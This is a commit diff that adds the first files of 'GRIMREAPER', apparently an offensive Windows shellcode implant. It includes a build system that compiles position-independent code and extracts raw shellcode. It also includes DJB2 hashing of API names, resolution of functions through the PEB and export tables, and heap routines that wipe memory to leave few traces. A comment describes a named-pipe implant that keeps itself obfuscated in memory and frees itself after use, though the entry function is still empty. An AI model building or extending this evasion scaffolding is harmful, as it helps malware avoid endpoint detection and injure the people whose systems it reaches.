Commit start of stable implementation of the concept.

Common.h

@@ -0,0 +1,23 @@
+/*!
+ *
+ * GRIMREPEAR
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#pragma once
+
+#include <windows.h>
+#include <ntstatus.h>
+#include "Native.h"
+#include "Macros.h"
+#include "Labels.h"
+#include "MacObf.h"
+#include "Memory.h"
+#include "Hash.h"
+#include "Peb.h"
+#include "Obf.h"
+#include "Pe.h"

Entry.c

@@ -0,0 +1,30 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#include "Common.h"
+
+/*!
+ *
+ * Purpose:
+ *
+ * Starts a named pipe server and awaits on the connection or until
+ * a timeout is reached. When a connection is not made and a timeout
+ * is not reached, the shellcode will remain obfuscated.
+ *
+ * If a connection is made, the shellcode will also attempt to obfuscate 
+ * itself during read/write operations. Once a connection is lost or a 
+ * timeout is reached during this R/W loop the shellcode will free itself 
+ * from memory.
+ *
+!*/
+D_SEC( B ) VOID WINAPI Entry( VOID )
+{
+
+};

Hash.c

@@ -0,0 +1,69 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#include "Common.h"
+
+/*!
+ *
+ * Purpose:
+ *
+ * Returns a DJB2 hash representation of the input
+ * string up to the specified length. If no length
+ * is specified it is presumed it is a ANSI string.
+ * and will calculcate the buffer up until the \0
+ * terminator.
+ *
+!*/
+D_SEC( B ) UINT32 HashString( _In_ PUINT8 Buffer, _In_ UINT32 Length )
+{
+	UINT8	Val = 0;
+	UINT32	Hsh = 5381;
+	PUINT8	Ptr = C_PTR( Buffer );
+
+	/* Loop through until we reach a NULL terminator OR the length specified if not 0 */
+	while ( TRUE ) {
+		/* Extract the current ANSI character */
+		Val = *Ptr;
+
+		/* Was no length specified? */
+		if ( ! Length ) {
+			/* Have we reached a NULL terminator? */
+			if ( ! Val ) {
+				/* Abort the loop */
+				break;
+			};
+		} else
+		{
+			/* Have we exceeded the length of the buffer if a length was specified? */
+			if ( ( UINT32 )( Ptr - ( PUINT8 ) Buffer ) >= Length ) {
+				/* Abort the loop */
+				break;
+			};
+
+			/* Has a NULL character? */
+			if ( ! Val ) {
+				/* Move onto the next character since we skip it */
+				++Ptr ; continue;
+			};
+		};
+
+		/* Is an lowercase character? */
+		if ( Val >= 'a' ) {
+			/* Force UPPERCASE */
+			Val -= 0x20;
+		};
+
+		/* Hash the current character and move onto the next char */
+		Hsh = ( ( Hsh << 5 ) + Hsh ) + Val; ++Ptr ;
+	};
+
+	/* Return the hash */
+	return Hsh;
+};

Hash.h

@@ -0,0 +1,24 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#pragma once
+
+/*!
+ *
+ * Purpose:
+ *
+ * Returns a DJB2 hash representation of the input
+ * string up to the specified length. If no length
+ * is specified it is presumed it is a ANSI string.
+ * and will calculcate the buffer up until the \0
+ * terminator.
+ *
+!*/
+D_SEC( B ) UINT32 HashString( _In_ PUINT8 Buffer, _In_ UINT32 Length );

Labels.h

@@ -0,0 +1,14 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#pragma once
+
+static ULONG_PTR Start( VOID );
+static ULONG_PTR GetIp( VOID );

MacObf.h

@@ -0,0 +1,20 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#pragma once
+
+/* No-op macro for informing the makefile to make a hash */
+#define OBF_HASH_MAKE( x )
+
+/* No-op macro for informing the makefile to make a stra */
+#define OBF_STRA_MAKE( x )
+
+/* No-op macro for informing the makefile to make a strw */
+#define OBF_STRW_MAKE( x )

Macros.h

@@ -0,0 +1,26 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#pragma once
+
+/* Gets the address of an interal function or variable relative to GetIp */
+#define G_PTR( x )	( ULONG_PTR )( GetIp( ) - ( ( ULONG_PTR ) & GetIp - ( ULONG_PTR ) x ) )		
+
+/* Puts a function or variable in a specific region of .text */
+#define D_SEC( x )	__attribute__(( section( ".text$" #x ) ))
+
+/* Cast as a pointer with the specified typedef and same name */
+#define D_API( x )	__typeof__( x ) * x
+
+/* Cast as a pointer-wide integer */
+#define U_PTR( x )	( ( ULONG_PTR ) x )
+
+/* Cast as a pointer */
+#define C_PTR( x )	( ( PVOID ) x )

Makefile

@@ -0,0 +1,47 @@
+CC_X64	:= x86_64-w64-mingw32-gcc
+CC_X86	:= i686-w64-mingw32-gcc
+SOURCE	:= $(wildcard *.c)
+
+HSHKEY	:= $(shell python3 -c "import random; print(hex(random.getrandbits(32)))")
+ENCKEY	:= $(shell python3 -c "import random; print(hex(random.getrandbits(8)))")
+CFLAGS	:= $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib 
+CFLAGS 	:= $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
+CFLAGS  := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
+CFLAGS	:= $(CFLAGS) -falign-labels=1 -Wl,-TSectionLink.ld
+CFLAGS	:= $(CFLAGS) -fdata-sections
+LFLAGS	:= $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup
+
+OUTX64	:= grimreaper.x64.exe
+OUTX86	:= grimreaper.x86.exe
+SHLX64	:= grimreaper.x64.bin
+SHLX86	:= grimreaper.x86.bin
+
+REPLACE_FIX	      := $
+REPLACE_OBF_HASH_MAKE := 's/OBF_HASH_MAKE(\([^)]*\))/\$(REPLACE_FIX){ obf_hash_make( \1 ) }/g'
+REPLACE_OBF_STRA_MAKE := 's/OBF_STRA_MAKE(\([^)]*\))/\$(REPLACE_FIX){ obf_stra_make( \1 ) }/g'
+REPLACE_OBF_STRW_MAKE := 's/OBF_STRW_MAKE(\([^)]*\))/\$(REPLACE_FIX){ obf_strw_make( \1 ) }/g'
+
+all: $(SOURCE)
+	@ nasm -f win64 asm/x64/GetIp.asm -o bin/GetIp.x64.o
+	@ nasm -f win64 asm/x64/Start.asm -o bin/Start.x64.o
+	@ nasm -f win32 asm/x86/GetIp.asm -o bin/GetIp.x86.o
+	@ nasm -f win32 asm/x86/Start.asm -o bin/Start.x86.o
+	@ $(CC_X64) bin/Start.x64.o bin/GetIp.x64.o bin/*.c -I. $(CFLAGS) $(LFLAGS) -o bin/$(OUTX64)
+	@ $(CC_X86) bin/Start.x86.o bin/GetIp.x86.o bin/*.c -I. $(CFLAGS) $(LFLAGS) -o bin/$(OUTX86)
+	@ python3 scripts/extract.py -f bin/$(OUTX64) -o $(SHLX64)
+	@ python3 scripts/extract.py -f bin/$(OUTX86) -o $(SHLX86)
+
+$(SOURCE):
+	@ mkdir -p bin
+	@ cp -rf $@ bin/$(basename $@).mako
+	@ sed -i $(REPLACE_OBF_HASH_MAKE) bin/$(basename $@).mako
+	@ sed -i $(REPLACE_OBF_STRA_MAKE) bin/$(basename $@).mako
+	@ sed -i $(REPLACE_OBF_STRW_MAKE) bin/$(basename $@).mako
+	@ python3 scripts/export_template.py -f bin/$(basename $@).mako -o bin/$(basename $@).c
+
+clean:
+	@ rm -rf bin
+	@ rm -rf $(OUTX64) $(OUTX86)
+	@ rm -rf $(SHLX64) $(SHLX86)
+
+.PHONY: all $(SOURCE) clean

Memory.c

@@ -0,0 +1,129 @@
+/*!
+ *
+ * GRIMREAPER
+ *
+ * Austin Hudson
+ *
+ * suspicious.actor
+ *
+!*/
+
+#include "Common.h"
+
+typedef struct
+{
+	D_API( RtlReAllocateHeap );
+	D_API( RtlAllocateHeap );
+	D_API( RtlCompactHeap );
+	D_API( RtlFreeHeap );
+	D_API( RtlZeroHeap );
+	D_API( RtlSizeHeap );
+} API ;
+
+/*!
+ *
+ * Purpose:
+ * 
+ * Mimic's realloc and returns the allocated block of heap memory.
+ *
+!*/
+D_SEC( B ) PVOID MemoryReAlloc( _In_ PVOID Memory, _In_ SIZE_T Length )
+{
+	API	Api;
+
+	PVOID	Ptr = NULL;
+
+	/* Zero out stack structures */
+	RtlSecureZeroMemory( &Api, sizeof( Api ) );
+
+	Api.RtlReAllocateHeap = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlReAllocateHeap" ) );
+	Api.RtlCompactHeap    = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlCompactHeap" ) );
+	Api.RtlZeroHeap       = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlZeroHeap" ) );
+
+	/* Allocate a block of memory */
+	Ptr = Api.RtlReAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Memory, Length );
+
+	if ( Ptr != NULL ) {
+
+		/* Zero the unused blocks of memory */
+		Api.RtlZeroHeap( NtCurrentPeb()->ProcessHeap, 0 );
+
+		/* Compact the heap */
+		Api.RtlCompactHeap( NtCurrentPeb()->ProcessHeap, 0 );
+	};
+
+	/* Zero out stack structures */
+	RtlSecureZeroMemory( &Api, sizeof( Api ) );
+
+	/* Return the pointer */
+	return Ptr;
+};
+
+/*!
+ *
+ * Purpose:
+ *
+ * Mimic's malloc and returns a allocated block of heap memory.
+ *
+!*/
+D_SEC( B ) PVOID MemoryAlloc( _In_ SIZE_T Length )
+{
+	API	Api;
+
+	PVOID	Ptr = NULL;
+
+	/* Zero out stack structures */
+	RtlSecureZeroMemory( &Api, sizeof( Api ) );
+
+	Api.RtlAllocateHeap = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlAllocateHeap" ) );
+
+	/* Return the pointer to the heap */
+	Ptr = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Length );
+
+	/* Zero out stack structures */
+	RtlSecureZeroMemory( &Api, sizeof( Api ) );
+
+	/* Return the pointer */
+	return Ptr;
+}
+
+/*!
+ *
+ * Purpose:
+ *
+ * Frees the block of memory.
+ *
+!*/
+D_SEC( B ) VOID MemoryFree( _In_ PVOID Buffer )
+{
+	API	Api;
+
+	SIZE_T	Len = 0;
+
+	/* Zero out stack structures */
+	RtlSecureZeroMemory( &Api, sizeof( Api ) );
+
+	Api.RtlCompactHeap = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlCompactHeap" ) );
+	Api.RtlFreeHeap    = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlFreeHeap" ) );
+	Api.RtlZeroHeap    = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlZeroHeap" ) );
+	Api.RtlSizeHeap    = PeGetFuncEat( PebGetModule( OBF_HASH_MAKE( "ntdll.dll" ) ), OBF_HASH_MAKE( "RtlSizeHeap" ) );
+
+	/* Lookup the length of the buffer */
+	if ( ( Len = Api.RtlSizeHeap( NtCurrentPeb()->ProcessHeap, 0, Buffer ) ) != -1 ) {
+
+		/* Zero the entire heap buffer */
+		__builtin_memset( Buffer, 0, Len );
+
+		/* Free the heap buffer */
+		Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Buffer );	
+
+		/* Zero all allocations */
+		Api.RtlZeroHeap( NtCurrentPeb()->ProcessHeap, 0 );
+
+		/* Comparess the heap */
+		Api.RtlCompactHeap( NtCurrentPeb()->ProcessHeap, 0 );
+	};
+
+	/* Zero out stack structures */
+	RtlSecureZeroMemory( &Api, sizeof( Api ) );
+};